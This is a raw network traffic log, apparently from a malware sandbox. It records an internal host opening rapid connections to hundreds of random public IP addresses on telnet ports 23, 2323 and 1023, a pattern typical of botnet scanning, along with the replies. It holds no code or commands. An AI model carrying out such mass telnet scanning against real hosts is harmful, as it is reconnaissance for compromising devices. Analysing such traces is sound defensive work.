                                                                        Dec 6, 2024 00:37:09.872168064 CET4197323192.168.2.2392.55.70.113
                                                                        Dec 6, 2024 00:37:09.872190952 CET4197323192.168.2.23153.70.60.53
                                                                        Dec 6, 2024 00:37:09.872191906 CET419732323192.168.2.23196.11.108.88
                                                                        Dec 6, 2024 00:37:09.872191906 CET4197323192.168.2.23192.149.48.171
                                                                        Dec 6, 2024 00:37:09.872193098 CET4197323192.168.2.23118.129.231.154
                                                                        Dec 6, 2024 00:37:09.872191906 CET4197323192.168.2.2388.124.129.38
                                                                        Dec 6, 2024 00:37:09.872193098 CET4197323192.168.2.2313.61.58.49
                                                                        Dec 6, 2024 00:37:09.872194052 CET4197323192.168.2.23156.103.33.126
                                                                        Dec 6, 2024 00:37:09.872195005 CET4197323192.168.2.23220.126.18.7
                                                                        Dec 6, 2024 00:37:09.872210026 CET4197323192.168.2.23139.237.29.144
                                                                        Dec 6, 2024 00:37:09.872215986 CET4197323192.168.2.23122.236.177.235
                                                                        Dec 6, 2024 00:37:09.872215986 CET4197323192.168.2.23207.39.143.148
                                                                        Dec 6, 2024 00:37:09.872217894 CET4197323192.168.2.23187.95.218.96
                                                                        Dec 6, 2024 00:37:09.872217894 CET4197323192.168.2.2387.116.224.59
                                                                        Dec 6, 2024 00:37:09.872226954 CET4197323192.168.2.23198.239.141.59
                                                                        Dec 6, 2024 00:37:09.872229099 CET4197323192.168.2.2320.50.180.18
                                                                        Dec 6, 2024 00:37:09.872242928 CET419732323192.168.2.2331.252.210.152
                                                                        Dec 6, 2024 00:37:09.872242928 CET4197323192.168.2.2331.125.42.248
                                                                        Dec 6, 2024 00:37:09.872243881 CET4197323192.168.2.23210.213.80.98
                                                                        Dec 6, 2024 00:37:09.872248888 CET4197323192.168.2.2318.112.177.217
                                                                        Dec 6, 2024 00:37:09.872276068 CET4197323192.168.2.23146.60.27.77
                                                                        Dec 6, 2024 00:37:09.872279882 CET419732323192.168.2.23136.0.242.103
                                                                        Dec 6, 2024 00:37:09.872281075 CET4197323192.168.2.2386.123.252.35
                                                                        Dec 6, 2024 00:37:09.872284889 CET4197323192.168.2.23173.19.76.39
                                                                        Dec 6, 2024 00:37:09.872284889 CET4197323192.168.2.23180.53.146.203
                                                                        Dec 6, 2024 00:37:09.872287035 CET4197323192.168.2.23113.182.205.43
                                                                        Dec 6, 2024 00:37:09.872287035 CET4197323192.168.2.23175.4.250.86
                                                                        Dec 6, 2024 00:37:09.872303009 CET4197323192.168.2.23162.232.29.109
                                                                        Dec 6, 2024 00:37:09.872303963 CET4197323192.168.2.2374.80.145.105
                                                                        Dec 6, 2024 00:37:09.872303963 CET4197323192.168.2.23146.47.196.151
                                                                        Dec 6, 2024 00:37:09.872308016 CET419732323192.168.2.23161.241.138.115
                                                                        Dec 6, 2024 00:37:09.872308969 CET4197323192.168.2.23220.170.59.125
                                                                        Dec 6, 2024 00:37:09.872312069 CET4197323192.168.2.23165.144.152.196
                                                                        Dec 6, 2024 00:37:09.872325897 CET4197323192.168.2.23174.80.17.138
                                                                        Dec 6, 2024 00:37:09.872327089 CET4197323192.168.2.23126.218.243.138
                                                                        Dec 6, 2024 00:37:09.872328043 CET4197323192.168.2.23180.150.127.103
                                                                        Dec 6, 2024 00:37:09.872330904 CET4197323192.168.2.2345.2.53.16
                                                                        Dec 6, 2024 00:37:09.872330904 CET419732323192.168.2.23188.237.109.99
                                                                        Dec 6, 2024 00:37:09.872334957 CET4197323192.168.2.23112.85.101.84
                                                                        Dec 6, 2024 00:37:09.872334957 CET4197323192.168.2.2389.21.52.38
                                                                        Dec 6, 2024 00:37:09.872334957 CET4197323192.168.2.23176.25.192.146
                                                                        Dec 6, 2024 00:37:09.872334957 CET4197323192.168.2.23213.228.50.0
                                                                        Dec 6, 2024 00:37:09.872339964 CET4197323192.168.2.23166.74.199.240
                                                                        Dec 6, 2024 00:37:09.872342110 CET4197323192.168.2.2357.22.165.204
                                                                        Dec 6, 2024 00:37:09.872342110 CET4197323192.168.2.23155.59.91.39
                                                                        Dec 6, 2024 00:37:09.872342110 CET419731023192.168.2.2394.95.131.239
                                                                        Dec 6, 2024 00:37:09.872353077 CET4197323192.168.2.23128.254.43.39
                                                                        Dec 6, 2024 00:37:09.872363091 CET4197323192.168.2.23121.147.69.6
                                                                        Dec 6, 2024 00:37:09.872371912 CET4197323192.168.2.23100.10.86.230
                                                                        Dec 6, 2024 00:37:09.872378111 CET4197323192.168.2.2359.221.138.39
                                                                        Dec 6, 2024 00:37:09.872391939 CET4197323192.168.2.2377.223.249.102
                                                                        Dec 6, 2024 00:37:09.872395992 CET4197323192.168.2.23197.252.167.232
                                                                        Dec 6, 2024 00:37:09.872406960 CET419732323192.168.2.23128.24.113.39
                                                                        Dec 6, 2024 00:37:09.872409105 CET4197323192.168.2.234.145.41.197
                                                                        Dec 6, 2024 00:37:09.872423887 CET4197323192.168.2.23186.41.56.218
                                                                        Dec 6, 2024 00:37:09.872437954 CET4197323192.168.2.23159.13.3.176
                                                                        Dec 6, 2024 00:37:09.872437954 CET4197323192.168.2.2340.63.73.223
                                                                        Dec 6, 2024 00:37:09.872451067 CET4197323192.168.2.232.66.220.127
                                                                        Dec 6, 2024 00:37:09.872461081 CET4197323192.168.2.23119.153.58.32
                                                                        Dec 6, 2024 00:37:09.872466087 CET4197323192.168.2.2332.198.34.224
                                                                        Dec 6, 2024 00:37:09.872477055 CET4197323192.168.2.23151.119.145.221
                                                                        Dec 6, 2024 00:37:09.872489929 CET4197323192.168.2.2365.111.89.243
                                                                        Dec 6, 2024 00:37:09.872493982 CET419732323192.168.2.23122.102.122.137
                                                                        Dec 6, 2024 00:37:09.872504950 CET4197323192.168.2.23103.104.237.81
                                                                        Dec 6, 2024 00:37:09.872509956 CET4197323192.168.2.23131.253.210.216
                                                                        Dec 6, 2024 00:37:09.872524977 CET4197323192.168.2.23150.13.201.255
                                                                        Dec 6, 2024 00:37:09.872525930 CET4197323192.168.2.23194.201.49.98
                                                                        Dec 6, 2024 00:37:09.872529984 CET4197323192.168.2.2347.152.234.163
                                                                        Dec 6, 2024 00:37:09.872546911 CET4197323192.168.2.2337.91.84.128
                                                                        Dec 6, 2024 00:37:09.872546911 CET4197323192.168.2.2344.60.180.167
                                                                        Dec 6, 2024 00:37:09.872560024 CET4197323192.168.2.23126.74.10.214
                                                                        Dec 6, 2024 00:37:09.872567892 CET4197323192.168.2.23159.75.201.199
                                                                        Dec 6, 2024 00:37:09.872571945 CET419732323192.168.2.23136.9.61.154
                                                                        Dec 6, 2024 00:37:09.872586012 CET4197323192.168.2.23169.219.122.4
                                                                        Dec 6, 2024 00:37:09.872589111 CET4197323192.168.2.23167.37.204.111
                                                                        Dec 6, 2024 00:37:09.872595072 CET4197323192.168.2.2367.161.32.35
                                                                        Dec 6, 2024 00:37:09.872602940 CET4197323192.168.2.23107.142.147.72
                                                                        Dec 6, 2024 00:37:09.872611046 CET4197323192.168.2.23123.10.205.51
                                                                        Dec 6, 2024 00:37:09.872622013 CET4197323192.168.2.23199.77.241.91
                                                                        Dec 6, 2024 00:37:09.872629881 CET4197323192.168.2.23157.7.86.117
                                                                        Dec 6, 2024 00:37:09.872638941 CET4197323192.168.2.23156.25.220.4
                                                                        Dec 6, 2024 00:37:09.872648001 CET4197323192.168.2.23195.90.79.238
                                                                        Dec 6, 2024 00:37:09.907587051 CET4036681192.168.2.2337.118.61.47
                                                                        Dec 6, 2024 00:37:09.928673983 CET4876280192.168.2.23138.35.154.46
                                                                        Dec 6, 2024 00:37:09.988152981 CET10234197357.24.236.148192.168.2.23
                                                                        Dec 6, 2024 00:37:09.988233089 CET419731023192.168.2.2357.24.236.148
                                                                        Dec 6, 2024 00:37:09.988615990 CET2341973100.195.179.108192.168.2.23
                                                                        Dec 6, 2024 00:37:09.988665104 CET4197323192.168.2.23100.195.179.108
                                                                        Dec 6, 2024 00:37:09.994862080 CET2341973129.13.172.26192.168.2.23
                                                                        Dec 6, 2024 00:37:09.994873047 CET234197360.81.91.178192.168.2.23
                                                                        Dec 6, 2024 00:37:09.994880915 CET234197341.148.61.47192.168.2.23
                                                                        Dec 6, 2024 00:37:09.994893074 CET2341973150.23.129.19192.168.2.23
                                                                        Dec 6, 2024 00:37:09.994908094 CET4197323192.168.2.23129.13.172.26
                                                                        Dec 6, 2024 00:37:09.994908094 CET4197323192.168.2.2360.81.91.178
                                                                        Dec 6, 2024 00:37:09.994909048 CET4197323192.168.2.2341.148.61.47
                                                                        Dec 6, 2024 00:37:09.994930029 CET2341973196.65.150.35192.168.2.23
                                                                        Dec 6, 2024 00:37:09.994929075 CET4197323192.168.2.23150.23.129.19
                                                                        Dec 6, 2024 00:37:09.994941950 CET2341973222.112.76.53192.168.2.23
                                                                        Dec 6, 2024 00:37:09.994951010 CET232341973112.61.221.135192.168.2.23
                                                                        Dec 6, 2024 00:37:09.994966984 CET2341973126.20.150.255192.168.2.23
                                                                        Dec 6, 2024 00:37:09.994972944 CET4197323192.168.2.23196.65.150.35
                                                                        Dec 6, 2024 00:37:09.994972944 CET4197323192.168.2.23222.112.76.53
                                                                        Dec 6, 2024 00:37:09.994982958 CET234197357.84.179.180192.168.2.23
                                                                        Dec 6, 2024 00:37:09.994987965 CET419732323192.168.2.23112.61.221.135
                                                                        Dec 6, 2024 00:37:09.994998932 CET4197323192.168.2.23126.20.150.255
                                                                        Dec 6, 2024 00:37:09.995011091 CET4197323192.168.2.2357.84.179.180
                                                                        Dec 6, 2024 00:37:09.995150089 CET2341973106.147.146.136192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995161057 CET23419731.97.151.180192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995168924 CET232341973166.43.67.243192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995183945 CET234197318.149.235.123192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995193005 CET2341973126.194.19.209192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995193005 CET4197323192.168.2.23106.147.146.136
                                                                        Dec 6, 2024 00:37:09.995193005 CET4197323192.168.2.231.97.151.180
                                                                        Dec 6, 2024 00:37:09.995203972 CET419732323192.168.2.23166.43.67.243
                                                                        Dec 6, 2024 00:37:09.995209932 CET234197368.37.182.58192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995218992 CET234197343.78.163.200192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995220900 CET4197323192.168.2.2318.149.235.123
                                                                        Dec 6, 2024 00:37:09.995224953 CET4197323192.168.2.23126.194.19.209
                                                                        Dec 6, 2024 00:37:09.995229006 CET23419738.196.206.254192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995239973 CET2341973148.3.62.180192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995242119 CET4197323192.168.2.2343.78.163.200
                                                                        Dec 6, 2024 00:37:09.995245934 CET4197323192.168.2.2368.37.182.58
                                                                        Dec 6, 2024 00:37:09.995254993 CET2341973133.52.58.76192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995265007 CET234197382.70.198.229192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995269060 CET4197323192.168.2.23148.3.62.180
                                                                        Dec 6, 2024 00:37:09.995270014 CET4197323192.168.2.238.196.206.254
                                                                        Dec 6, 2024 00:37:09.995280027 CET234197392.145.131.162192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995287895 CET4197323192.168.2.23133.52.58.76
                                                                        Dec 6, 2024 00:37:09.995289087 CET2341973212.180.147.1192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995294094 CET4197323192.168.2.2382.70.198.229
                                                                        Dec 6, 2024 00:37:09.995301008 CET2341973181.111.172.20192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995316029 CET4197323192.168.2.2392.145.131.162
                                                                        Dec 6, 2024 00:37:09.995321035 CET2341973156.243.254.166192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995322943 CET4197323192.168.2.23212.180.147.1
                                                                        Dec 6, 2024 00:37:09.995328903 CET4197323192.168.2.23181.111.172.20
                                                                        Dec 6, 2024 00:37:09.995332003 CET2341973201.7.219.149192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995342016 CET234197388.54.176.96192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995354891 CET234197346.156.212.201192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995354891 CET4197323192.168.2.23156.243.254.166
                                                                        Dec 6, 2024 00:37:09.995357990 CET4197323192.168.2.23201.7.219.149
                                                                        Dec 6, 2024 00:37:09.995368958 CET234197382.29.49.16192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995372057 CET4197323192.168.2.2388.54.176.96
                                                                        Dec 6, 2024 00:37:09.995398045 CET4197323192.168.2.2346.156.212.201
                                                                        Dec 6, 2024 00:37:09.995410919 CET4197323192.168.2.2382.29.49.16
                                                                        Dec 6, 2024 00:37:09.995511055 CET23234197395.117.37.24192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995527029 CET234197367.146.199.81192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995537996 CET234197370.174.159.243192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995549917 CET419732323192.168.2.2395.117.37.24
                                                                        Dec 6, 2024 00:37:09.995551109 CET234197390.214.155.37192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995558023 CET4197323192.168.2.2367.146.199.81
                                                                        Dec 6, 2024 00:37:09.995573997 CET23234197363.249.7.172192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995573997 CET4197323192.168.2.2370.174.159.243
                                                                        Dec 6, 2024 00:37:09.995585918 CET2341973152.129.228.235192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995587111 CET4197323192.168.2.2390.214.155.37
                                                                        Dec 6, 2024 00:37:09.995595932 CET23419734.77.67.193192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995604992 CET2341973174.174.232.76192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995615005 CET419732323192.168.2.2363.249.7.172
                                                                        Dec 6, 2024 00:37:09.995616913 CET4197323192.168.2.23152.129.228.235
                                                                        Dec 6, 2024 00:37:09.995630026 CET4197323192.168.2.234.77.67.193
                                                                        Dec 6, 2024 00:37:09.995630026 CET4197323192.168.2.23174.174.232.76
                                                                        Dec 6, 2024 00:37:09.995702982 CET234197353.67.237.239192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995721102 CET2341973108.28.50.252192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995732069 CET234197339.166.87.34192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995739937 CET234197377.90.51.20192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995743036 CET4197323192.168.2.2353.67.237.239
                                                                        Dec 6, 2024 00:37:09.995757103 CET4197323192.168.2.23108.28.50.252
                                                                        Dec 6, 2024 00:37:09.995759010 CET4197323192.168.2.2339.166.87.34
                                                                        Dec 6, 2024 00:37:09.995758057 CET234197317.249.197.144192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995773077 CET4197323192.168.2.2377.90.51.20
                                                                        Dec 6, 2024 00:37:09.995775938 CET2341973177.50.23.147192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995785952 CET234197362.201.38.225192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995795012 CET234197384.5.232.122192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995798111 CET4197323192.168.2.2317.249.197.144
                                                                        Dec 6, 2024 00:37:09.995809078 CET4197323192.168.2.23177.50.23.147
                                                                        Dec 6, 2024 00:37:09.995812893 CET234197378.115.171.193192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995824099 CET4197323192.168.2.2384.5.232.122
                                                                        Dec 6, 2024 00:37:09.995825052 CET4197323192.168.2.2362.201.38.225
                                                                        Dec 6, 2024 00:37:09.995834112 CET234197362.60.166.230192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995845079 CET2341973116.190.27.246192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995850086 CET4197323192.168.2.2378.115.171.193
                                                                        Dec 6, 2024 00:37:09.995853901 CET2341973213.213.18.253192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995863914 CET2341973162.23.247.65192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995872974 CET4197323192.168.2.2362.60.166.230
                                                                        Dec 6, 2024 00:37:09.995873928 CET4197323192.168.2.23116.190.27.246
                                                                        Dec 6, 2024 00:37:09.995877981 CET2323419731.81.116.14192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995886087 CET4197323192.168.2.23213.213.18.253
                                                                        Dec 6, 2024 00:37:09.995894909 CET4197323192.168.2.23162.23.247.65
                                                                        Dec 6, 2024 00:37:09.995894909 CET2341973219.147.3.74192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995904922 CET234197338.67.125.4192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995909929 CET419732323192.168.2.231.81.116.14
                                                                        Dec 6, 2024 00:37:09.995914936 CET234197372.19.51.210192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995927095 CET4197323192.168.2.2338.67.125.4
                                                                        Dec 6, 2024 00:37:09.995928049 CET2341973182.109.152.12192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995928049 CET4197323192.168.2.23219.147.3.74
                                                                        Dec 6, 2024 00:37:09.995940924 CET234197376.94.252.48192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995945930 CET4197323192.168.2.2372.19.51.210
                                                                        Dec 6, 2024 00:37:09.995951891 CET234197323.211.7.151192.168.2.23
                                                                        Dec 6, 2024 00:37:09.995964050 CET4197323192.168.2.23182.109.152.12
                                                                        Dec 6, 2024 00:37:09.995975018 CET4197323192.168.2.2376.94.252.48
                                                                        Dec 6, 2024 00:37:09.995978117 CET4197323192.168.2.2323.211.7.151
                                                                        Dec 6, 2024 00:37:09.996114016 CET2341973190.194.208.202192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996123075 CET2341973151.56.185.17192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996130943 CET2341973179.49.246.27192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996150970 CET4197323192.168.2.23190.194.208.202
                                                                        Dec 6, 2024 00:37:09.996156931 CET4197323192.168.2.23151.56.185.17
                                                                        Dec 6, 2024 00:37:09.996170998 CET4197323192.168.2.23179.49.246.27
                                                                        Dec 6, 2024 00:37:09.996193886 CET23419732.192.84.51192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996218920 CET23234197358.210.109.236192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996232986 CET2341973114.35.211.210192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996233940 CET4197323192.168.2.232.192.84.51
                                                                        Dec 6, 2024 00:37:09.996243000 CET234197368.161.124.50192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996248960 CET419732323192.168.2.2358.210.109.236
                                                                        Dec 6, 2024 00:37:09.996253014 CET234197375.37.76.127192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996257067 CET4197323192.168.2.23114.35.211.210
                                                                        Dec 6, 2024 00:37:09.996268988 CET2341973109.102.205.150192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996278048 CET2341973156.31.135.163192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996282101 CET4197323192.168.2.2375.37.76.127
                                                                        Dec 6, 2024 00:37:09.996282101 CET4197323192.168.2.2368.161.124.50
                                                                        Dec 6, 2024 00:37:09.996285915 CET234197312.219.121.16192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996304035 CET2341973182.240.204.45192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996304989 CET4197323192.168.2.23156.31.135.163
                                                                        Dec 6, 2024 00:37:09.996306896 CET4197323192.168.2.23109.102.205.150
                                                                        Dec 6, 2024 00:37:09.996314049 CET4197323192.168.2.2312.219.121.16
                                                                        Dec 6, 2024 00:37:09.996315956 CET234197342.238.76.153192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996332884 CET234197372.148.204.128192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996339083 CET4197323192.168.2.23182.240.204.45
                                                                        Dec 6, 2024 00:37:09.996342897 CET234197396.99.230.147192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996354103 CET4197323192.168.2.2342.238.76.153
                                                                        Dec 6, 2024 00:37:09.996361971 CET4197323192.168.2.2372.148.204.128
                                                                        Dec 6, 2024 00:37:09.996364117 CET232341973206.54.67.1192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996372938 CET4197323192.168.2.2396.99.230.147
                                                                        Dec 6, 2024 00:37:09.996373892 CET234197392.55.70.113192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996388912 CET2341973153.70.60.53192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996390104 CET419732323192.168.2.23206.54.67.1
                                                                        Dec 6, 2024 00:37:09.996398926 CET232341973196.11.108.88192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996409893 CET2341973118.129.231.154192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996412039 CET4197323192.168.2.2392.55.70.113
                                                                        Dec 6, 2024 00:37:09.996419907 CET2341973192.149.48.171192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996424913 CET4197323192.168.2.23153.70.60.53
                                                                        Dec 6, 2024 00:37:09.996424913 CET419732323192.168.2.23196.11.108.88
                                                                        Dec 6, 2024 00:37:09.996432066 CET2341973156.103.33.126192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996443987 CET234197388.124.129.38192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996449947 CET4197323192.168.2.23192.149.48.171
                                                                        Dec 6, 2024 00:37:09.996450901 CET4197323192.168.2.23118.129.231.154
                                                                        Dec 6, 2024 00:37:09.996460915 CET2341973220.126.18.7192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996465921 CET4197323192.168.2.23156.103.33.126
                                                                        Dec 6, 2024 00:37:09.996471882 CET234197313.61.58.49192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996480942 CET2341973139.237.29.144192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996480942 CET4197323192.168.2.2388.124.129.38
                                                                        Dec 6, 2024 00:37:09.996490002 CET2341973122.236.177.235192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996495008 CET4197323192.168.2.23220.126.18.7
                                                                        Dec 6, 2024 00:37:09.996500015 CET2341973187.95.218.96192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996503115 CET4197323192.168.2.2313.61.58.49
                                                                        Dec 6, 2024 00:37:09.996519089 CET4197323192.168.2.23139.237.29.144
                                                                        Dec 6, 2024 00:37:09.996524096 CET4197323192.168.2.23122.236.177.235
                                                                        Dec 6, 2024 00:37:09.996535063 CET4197323192.168.2.23187.95.218.96
                                                                        Dec 6, 2024 00:37:09.996783972 CET2341973207.39.143.148192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996822119 CET234197387.116.224.59192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996823072 CET4197323192.168.2.23207.39.143.148
                                                                        Dec 6, 2024 00:37:09.996831894 CET2341973198.239.141.59192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996844053 CET234197320.50.180.18192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996854067 CET23234197331.252.210.152192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996855021 CET4197323192.168.2.23198.239.141.59
                                                                        Dec 6, 2024 00:37:09.996856928 CET4197323192.168.2.2387.116.224.59
                                                                        Dec 6, 2024 00:37:09.996862888 CET234197331.125.42.248192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996871948 CET2341973210.213.80.98192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996882915 CET4197323192.168.2.2320.50.180.18
                                                                        Dec 6, 2024 00:37:09.996886015 CET419732323192.168.2.2331.252.210.152
                                                                        Dec 6, 2024 00:37:09.996890068 CET234197318.112.177.217192.168.2.23
                                                                        Dec 6, 2024 00:37:09.996901035 CET4197323192.168.2.2331.125.42.248
                                                                        Dec 6, 2024 00:37:09.996902943 CET4197323192.168.2.23210.213.80.98
                                                                        Dec 6, 2024 00:37:09.996927977 CET4197323192.168.2.2318.112.177.217
                                                                        Dec 6, 2024 00:37:09.997019053 CET2341973146.60.27.77192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997033119 CET232341973136.0.242.103192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997042894 CET2341973173.19.76.39192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997052908 CET4197323192.168.2.23146.60.27.77
                                                                        Dec 6, 2024 00:37:09.997057915 CET2341973113.182.205.43192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997067928 CET234197386.123.252.35192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997073889 CET419732323192.168.2.23136.0.242.103
                                                                        Dec 6, 2024 00:37:09.997075081 CET4197323192.168.2.23173.19.76.39
                                                                        Dec 6, 2024 00:37:09.997082949 CET2341973180.53.146.203192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997095108 CET4197323192.168.2.23113.182.205.43
                                                                        Dec 6, 2024 00:37:09.997097969 CET2341973175.4.250.86192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997102976 CET4197323192.168.2.2386.123.252.35
                                                                        Dec 6, 2024 00:37:09.997112036 CET2341973162.232.29.109192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997113943 CET4197323192.168.2.23180.53.146.203
                                                                        Dec 6, 2024 00:37:09.997124910 CET234197374.80.145.105192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997133970 CET2341973146.47.196.151192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997134924 CET4197323192.168.2.23175.4.250.86
                                                                        Dec 6, 2024 00:37:09.997143984 CET232341973161.241.138.115192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997148991 CET4197323192.168.2.23162.232.29.109
                                                                        Dec 6, 2024 00:37:09.997159004 CET2341973220.170.59.125192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997163057 CET4197323192.168.2.23146.47.196.151
                                                                        Dec 6, 2024 00:37:09.997163057 CET4197323192.168.2.2374.80.145.105
                                                                        Dec 6, 2024 00:37:09.997170925 CET2341973165.144.152.196192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997183084 CET2341973174.80.17.138192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997184038 CET419732323192.168.2.23161.241.138.115
                                                                        Dec 6, 2024 00:37:09.997191906 CET2341973126.218.243.138192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997193098 CET4197323192.168.2.23220.170.59.125
                                                                        Dec 6, 2024 00:37:09.997203112 CET2341973180.150.127.103192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997210979 CET4197323192.168.2.23165.144.152.196
                                                                        Dec 6, 2024 00:37:09.997211933 CET234197345.2.53.16192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997214079 CET4197323192.168.2.23174.80.17.138
                                                                        Dec 6, 2024 00:37:09.997220993 CET4197323192.168.2.23126.218.243.138
                                                                        Dec 6, 2024 00:37:09.997224092 CET232341973188.237.109.99192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997237921 CET2341973112.85.101.84192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997240067 CET4197323192.168.2.23180.150.127.103
                                                                        Dec 6, 2024 00:37:09.997241974 CET4197323192.168.2.2345.2.53.16
                                                                        Dec 6, 2024 00:37:09.997241974 CET419732323192.168.2.23188.237.109.99
                                                                        Dec 6, 2024 00:37:09.997252941 CET2341973166.74.199.240192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997271061 CET4197323192.168.2.23112.85.101.84
                                                                        Dec 6, 2024 00:37:09.997284889 CET4197323192.168.2.23166.74.199.240
                                                                        Dec 6, 2024 00:37:09.997459888 CET234197389.21.52.38192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997477055 CET234197357.22.165.204192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997493029 CET2341973176.25.192.146192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997508049 CET2341973213.228.50.0192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997508049 CET4197323192.168.2.2357.22.165.204
                                                                        Dec 6, 2024 00:37:09.997509956 CET4197323192.168.2.2389.21.52.38
                                                                        Dec 6, 2024 00:37:09.997517109 CET2341973155.59.91.39192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997526884 CET10234197394.95.131.239192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997529030 CET4197323192.168.2.23176.25.192.146
                                                                        Dec 6, 2024 00:37:09.997535944 CET4197323192.168.2.23213.228.50.0
                                                                        Dec 6, 2024 00:37:09.997553110 CET419731023192.168.2.2394.95.131.239
                                                                        Dec 6, 2024 00:37:09.997554064 CET4197323192.168.2.23155.59.91.39
                                                                        Dec 6, 2024 00:37:09.997560978 CET2341973128.254.43.39192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997576952 CET2341973121.147.69.6192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997598886 CET4197323192.168.2.23128.254.43.39
                                                                        Dec 6, 2024 00:37:09.997606039 CET2341973100.10.86.230192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997608900 CET4197323192.168.2.23121.147.69.6
                                                                        Dec 6, 2024 00:37:09.997615099 CET234197359.221.138.39192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997623920 CET234197377.223.249.102192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997633934 CET2341973197.252.167.232192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997642040 CET23419734.145.41.197192.168.2.23
                                                                        Dec 6, 2024 00:37:09.997642040 CET4197323192.168.2.2359.221.138.39
